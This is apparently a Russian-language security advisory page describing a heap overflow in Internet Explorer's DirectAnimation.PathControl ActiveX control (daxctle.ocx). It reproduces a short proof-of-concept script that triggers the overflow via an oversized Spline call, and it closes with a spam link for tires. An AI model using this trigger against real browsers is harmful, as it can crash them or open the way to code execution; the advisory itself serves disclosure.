Главная » Переполнение динамической памяти в Microsoft Internet Explorer

---

Уязвимость существует из-за недостаточной проверки входных данных вActiveX компоненте 'daxctle.ocx'. Удаленный пользователь может спомощью дескриптора DirectAnimation.PathControl вызвать переполнениединамической памяти и аварийно завершить работу браузера или выполнитьпроизвольный код на целевой системе. Пример:

// Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability
// tested on Windows 2000 SP4/XP SP2/2003 SP1
// http://www.xsec.org
// nop (nop#xsec.org)
// CLSID: {D7A7D7C3-D47F-11D0-89D3-00A0C90833E6}
// Info: Microsoft DirectAnimation Path
// ProgID: DirectAnimation.PathControl
// InprocServer32: C:WINNTsystem32daxctle.ocx
--!>
test var target = newActiveXObject("DirectAnimation.PathControl"); target.Spline(0xffffffff,1);

URL производителя: www.microsoft.com

Решение: Способов устранения уязвимости не существует в настоящее время. Категория: Баги и уязвимости | Просмотров: 89 Хотите купить летние шины - летние шины.